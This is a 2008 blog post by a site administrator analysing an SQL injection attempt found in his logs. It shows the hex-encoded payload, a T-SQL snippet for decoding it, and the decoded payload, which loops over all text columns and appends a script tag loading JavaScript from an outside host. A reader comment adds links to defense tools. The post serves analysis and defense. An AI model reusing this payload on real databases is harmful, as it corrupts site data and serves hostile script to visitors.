Saturday, June 21, 2008

SQL Injection Attack

I monitor the logs of a number of web sites and one of them has recently come under a SQL Injection Attack. Here is the code that was trying to be injected as a query param on a URL:

Exception in xxxxx.Page_Load() with param1=abc;DECLARE @S VARCHAR(4000);SET @S=CAST(
0x4445434C415245204054205641524348415228323535292C40432056415243484152283235352920444543
4C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C6
22E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520
612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5
220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D3136372920
4F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F4375727
36F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E
20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D2843
4F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C73637269707420737
2633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E2727272920
4645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220
AS VARCHAR(4000));EXEC(@S);--:
String or binary data would be truncated.
The statement has been terminated.

With thanks to the guys on AZGroups I managed to learn a lot about this.

There's a great discussion thread about this here:

http://www.webhostingtalk.com/showthread.php?t=686032

To decode the hex into the command that will be executed you can do that in SQL Server Management Studio by using the following syntax (kudos to slide_o_mix):

DECLARE @S VARCHAR(4000);
SET
@S=CAST(

Put hex characters here with leading 0x

AS VARCHAR(4000));
PRINT @S;

When decoded, the SQL Injection Attack reads as follows:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects
a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+']
SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chkadw.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Thanks to Scott Cate for further investigating this and decoding the riddle. Looks like the objective of this attack is to spam ads onto the target site.

1 comment:

  1. Recently came across this link which has some SQL Inject Defense Tools:
    blogs.msdn.com/.../sql-injection-d
    and this link:
    www.misfitgeek.com/.../Tools+To+Block+
    Haven't had a chance to look at them in any detail yet though...

    ReplyDelete